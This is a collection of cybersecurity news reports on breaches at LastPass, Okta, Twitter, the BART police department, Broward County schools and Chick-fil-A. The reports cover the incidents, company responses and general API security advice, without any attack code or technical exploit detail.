Identity and access management systems have recently been attacked by attackers, as a single compromise can unlock a veritable treasure trove of information across high-value accounts for attackers, not to mention a variety of enterprise pivot points for moving deeper into networks.

LastPass, for example, was targeted in August 2022 through an impersonation attack in which cyber attackers breached its development environment and stole source code and customer data. A follow-up attack on a cloud storage bucket utilized by the company occurred last month.

In March of last year, Okta revealed that cyberattackers had used a third-party customer support engineer's system to obtain access to an Okta back-end administrative panel used for customer management, among other things. There were approximately 366 customers affected, with two actual data breaches occurring.

No Evidence: Twitter Denies Hacking Claims and The Stolen Data Being Sold Online


Twitter has denied the claim of getting hacked and the stolen data being sold online. 

According to a LinkedIn post last week by Alon Gal, co-founder of the Israeli cybersecurity monitoring company Hudson Rock, stolen data has been discovered, that contained email addresses of more than 200 million twitter users. 

The breach would probably result in "hacking, targeted phishing, and doxxing," according to Gal, who labeled it as a "significant leak" and said that the information had been uploaded on an internet hacker forum. 

He claimed that despite alerting the firm, Twitter, he had not received a response. 

"I urge security researchers to conduct a thorough examination of the leaked data and rule out Twitter's conclusion of the data being an enrichment of some sort which did not originate from their own servers," says Alon Gal. 

Although, Twitter has denied all claims of the emails, allegedly linked to the users’ accounts, being obtained through a hack. 

In regards to the issue Twitter responded by stating “in response to recent media reports of Twitter users’ data being sold online, we conducted a thorough investigation and there is no evidence that data recently being sold was obtained by exploiting a vulnerability of Twitter systems.” 

According to Twitter, the stolen records in question was instead probably a collection of data “already publicly available online.” While it still warns online users to be wary of suspicious emails. 

Gal, meanwhile, disapproved of Twitter's answer in a fresh post on LinkedIn. In contrast to instances of data enrichments, he noted, “The authenticity of the leak is evident in the lack of false positives between Twitter usernames and emails found in the database, opposite to cases of data enrichments.” 

The disclosure came to light following the multiple reports that Twitter data of millions of users – 5.4 million in November 2022, 400 million in December 2022, and 200 million last week – have been exposed online for sale on cybercrime forums. 

The Breach Could Not Be Correlated to Previous or New Incidents 

Twitter, in its latest post says that the latest dataset breach of 200 million users “could not be correlated with the previously reported incident, nor with any new incident or any data originating from an exploitation of Twitter systems.” 

It added that, “None of the datasets analyzed contained passwords or information that could lead to passwords being compromised.” 

Moreover, in December 2022, another set of reports claimed that 400 million email addresses and phone numbers were stolen from Twitter – which the company denied as well.  

Hackers Release Private Information Following an Attack on the San Francisco Transit Police

 

Malicious hackers have uploaded a vast collection of private documents from the police department of a San Francisco Bay Area transit system to the internet, including specific claims of child abuse. 

The Bay Area Rapid Transit (BART) Police Department is responsible for the breach. BART's chief communications officer, Alicia Trost, stated in an email that authorities were looking into the uploaded files and that there had been no impact on BART services as a result of the hackers. The exact date of the hack is unknown. 

The culprits are part of a well-known ransomware hacker group that targets particular businesses and either encrypts private files or threatens to post them on the dark web. A review by NBC News found that the website where the BART Police leaks were posted contains more than 120,000 files.

Among the files are at least six scanned, unredacted reports describing alleged child abuse. These reports include the names and dates of birth of the children who are in danger, as well as descriptions of the alleged adult abusers in some cases. 

To prevent file sharing, ransomware hackers frequently demand money. Trost declined to provide more details, but Brett Callow, an analyst at the cybersecurity company Emsisoft, believes that the fact that the files are currently accessible online suggests that BART declined to make payment. 

A police officer can recommend a person for a mental health evaluation using the website's mental health record form. Other files include hiring paperwork for potential officers, police reports that name suspects in various crimes, and the names and licence numbers of contractors who have worked on BART projects.

Even though cyber extortion attacks on American public sector organisations, including police departments, have increased in frequency, such sensitive police file leaks are still uncommon. According to a survey conducted by Emsisoft, ransomware hackers successfully attacked over 100 networks connected to local government organisations last year. 

According to a Treasury Department estimate, ransomware attacks cost American businesses $886 million in 2021, the most recent year for which data is available. 

“Unfortunately, not enough progress has been made in securing public sector organizations,” Callow stated. “They can compromise investigations, resulting in exceptionally sensitive information leaking online, and even put people’s lives at risk — both officers and the public's.” 

A different hacker group broke into the Washington, D.C., Metropolitan Police Department in 2021 and released private information about 22 officers after the department refused to pay. 

Such hackers frequently target school districts in their attacks. Due to a "cyber security incident," which is a phrase frequently used to refer to a ransomware attack, Des Moines Public Schools cancelled classes on Tuesday. According to Emsisoft, ransomware affected nearly 2,000 American schools in 2022.

Twitter Data Breach Indicates How APIs Are a Goldmine for PII and Social Engineering


A Twitter API vulnerability that was detected in June 2021, and was later patched, has apparently been haunting the organization yet again. 

In December 2022, a hacker claimed to have access to the personal data of 400 million Twitter users for sale on the dark web markets. And only yesterday, the attacker published the account details and email addresses of 235 million users. 

The breached data revealed by the hacker includes account names, handle creation data, follower count, and email addresses of victims. Moreover, the threat actors can as well design social engineering campaigns to dupe people into providing them their personal data. 

Twitter: A Social Engineering Goldmine 

Social media giants provide threat actors with a gold mine of user data and personal information that they can utilize in order to perform social engineering scams. 

Getting a hold of just a user name, email address, and contextual information of a user’s profile, available to the public, a hacker may conduct reconnaissance on their targeted user and create phishing and scam campaigns that are specifically designed to dupe them into providing personal information. 

In this case, while the exposed information was limited to users’ information available publicly, the immense volume of accounts exposed in a single location (Twitter) has in fact provided a “goldmine of information” to the threat actors. 

The Link Between Social Engineering and API Attacks 

Unsecured APIs allow cybercriminals direct access to users’ Personally Identifiable Information (PII), such as username and password, which is captured when the user connects to any third-party service API. API attack thus provides threat actors with a window to collect large amounts of personal information for scams. 

An instance of this happened just a month ago when a threat actor leveraged an API flaw to gather the data of 80,000 executives throughout the private sector and sell it on the dark web. The threat actor had applied successfully to the FBI's InfraGard intelligence sharing service. 

The data collected during the incident included usernames, email addresses, Social Security numbers, and dates of birth of victims. This highly valuable information was utilized by the threat actors for developing social engineering dupes and spear phishing attacks. 

How to Protect APIs and PII? 

One of the main challenges faced while combating API breaches is how modern enterprises need to detect and secure a large number of APIs. A single vulnerability can put user data at risk of exfiltration, therefore there is little room for error. 

“Protecting organizations from API attacks requires consistent, diligent oversight of vendor management, and specifically ensuring that every API is fit for use […] It’s a lot for organizations to manage, but the risk is too great not to,” says Chris Bowen, CISO at ClearDATA.  “In healthcare, for example, where patient data is at stake, every API should address several components like identity management, access management, authentication, authorization, data transport, exchange security, and trusted connectivity.”

It has also been advised to the security team to not rely solely on simple authentication options like username and password in order to secure their APIs. 

“In today’s environment, basic usernames and passwords are no longer enough […] It’s now vital to use standards such as two-factor authentication (2FA) and/or secure authentication with OAuth,” says Will Au, senior director for DevOps, operations, and site reliability at Jitterbit. 

Moreover, measures such as utilizing a Web Application Firewall (WAF), and monitoring API traffic in real time can aid in detecting malicious activities, ultimately minimizing the risk of compromise.  

Prosecutors Review Broward Administrators’ Action Over the Data Breach


Broward prosecutors are investigating whether the former Schools Superintendent, Robert Runcie, and two other administrators have infringed any law when they used highly guarded information about a district ransomware attack in a private business pitch. 

While the district did not share details of the ransomware attack with the public, by involving an outside PR firm to help dodge questions and evade to include internal investigation details in writings. 

Runcie and former administrators Brian Katz and Philip Dunn, on the other hand, revealed numerous previously concealed details regarding the ransomware attack in September 2021 “case study” for Safer School Solutions, which is a Fort Lauderdale company owned by Katz and Dunn. 

The report included details of how the ransomware attack hindered the operation of 2,000 servers; how the district prioritized keeping the schools open over looking after the breach; and how law enforcement asked the district to offer a ransom, but not pay it to the hackers. The report also involved the district’s response to the Parkland shooting and the pandemic. 

A few months later, an education group led by Runcie granted the company a $1 million contract to offer security services to six school districts, none of which were in Florida. 

Runcie, who resigned from his position as superintendent in August 2021, is currently facing accusations of perjury in a different case. He has been charged with lying to a statewide grand jury that investigated the school district purchases by the Attorney General's Office of Statewide Prosecution. 

Attempts to contact him by phone, email, and through his attorney remain unsuccessful. 

Broward Data Breach 

In November 2021, Broward County Public School reported that the security incident on March 7, 2021, may have resulted in unauthorized access to some of its systems, potentially containing sensitive data of some faculty, staff, and students. 

While they were initially unaware of the data being compromised, it may have taken place during the investigation in June. 

The Broward school district later announced on its website that the affected victims were being notified about the breach. About 50,000 students and employees reportedly received notifications from the district of their data being breached during the ransomware attack that happened months ago. 

The school district was secretive about the attack, which happened between Nov. 12, 2020, and March 6, 2021, for months. This was apparenly advised by the lawyers and public relation company the district hired.  

Hackers Target Chick-fil-A Customers Credentials

Chick-fil-A- is investigating concerns of suspicious transactions on its mobile app after multiple users claimed that hackers gained their personal data, including bank account details.

Customers at Chick-fil-A, a well-known chicken restaurant business, may be the latest targets of hackers. According to a recent article in Nation's Restaurant News, the fast food chain is investigating potential hacks of mobile apps that have exposed customers' sensitive information.

According to Krebs on Security, one bank claimed it had nearly 9,000 customer card details listed in an alert sent to various financial institutions regarding a breach at an anonymous retailer that occurred between December 2, 2013, and September 30, 2014, and that Chick-fil-A locations were the only common point-of-purchase. As per Krebs, "the majority of the fraud, according to a financial source, appeared to be centered at sites in Georgia, Maryland, Pennsylvania, Texas, and Virginia."

Customers are recommended to promptly change their passwords to new ones that are distinct, complex, and therefore not used for other online platforms or accounts if they detect anything unusual.

In regard to the reports, Chick-fil-A posted a statement on social media stating that the company is aware of the matter and is working quickly to resolve it. The business does point out that it has not discovered proof that its internal security has been infiltrated by hackers or otherwise compromised.

Customers who are impacted can find information on what to do if they see any suspicious activity on their accounts, can see mobile orders placed without their consent, or discover that their loyalty points were fraudulently redeemed or used to purchase gifts on a support page on Chick-fil-One A's Membership Program customer service website.